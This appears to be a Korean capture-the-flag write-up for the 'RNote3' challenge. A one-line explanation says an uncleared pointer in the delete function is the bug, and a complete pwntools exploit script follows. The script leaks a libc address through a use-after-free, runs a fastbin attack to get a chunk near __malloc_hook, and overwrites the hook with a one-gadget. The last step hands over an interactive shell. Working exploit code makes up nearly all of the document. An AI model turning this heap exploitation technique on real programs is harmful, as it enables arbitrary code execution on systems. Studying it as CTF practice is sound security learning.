재미있었던 문제!!
delete 함수의 ptr을 초기화 하지 않아서 문제가 생긴다!! 초기화를 했는지 잘 살펴봐야겠다..ㅎㅎ 나머지는 간단하게 main_arena 쓱쓱 가져와서 libc 따고, malloc_hook 주변에 할당받고 malloc_hook 덮어주면 끝!
from pwn import *
s = process("./RNote3")
elf = ELF("./RNote3")
libc = ELF("./libc")
def add(title,size,content):
s.sendline("1")
s.recvuntil("please input title: ")
s.sendline(title)
s.recvuntil("please input content size: ")
s.sendline(str(size))
s.recvuntil("please input content: ")
s.sendline(content)
def view(title):
s.sendline("2")
s.recvuntil("please input note title: ")
s.sendline(title)
def edit(title,content):
s.sendline("3")
s.recvuntil("please input note title: ")
s.sendline(title)
s.recvuntil("please input new content: ")
s.sendline(content)
def dell(title):
s.sendline("4")
s.recvuntil("please input note title: ")
s.sendline(title)
def quit():
s.sendline("5")
gdb.attach(s)
add("1"*4,128,"A"*8)
add("2"*4,128,"B"*8)
dell("1"*4)
add("3"*4,128,"C"*8)
dell("A")
view("\x00")
s.recvuntil("note content: ")
leak = u64(s.recv(6)+"\x00\x00")
print "leak : " + hex(leak)
libc_base = leak - 0x3c4b78
print "libc_base : " + hex(libc_base)
one_shot = libc_base + 0xf02a4
malloc_hook = libc_base + libc.symbols['__malloc_hook']
print "one_shot : " + hex(one_shot)
print "malloc_hook : " + hex(malloc_hook)
add("4"*4,0x60,"D"*8)
add("5"*4,0x60,"E"*8)
dell("4"*4)
add("6"*4,0x60,"F"*8)
dell("asd")
edit("\x00",p64(malloc_hook-35))
add("7"*4,0x60,"G"*8)
add("8"*4,0x60,"H"*19+p64(one_shot))
dell("2")
s.interactive()
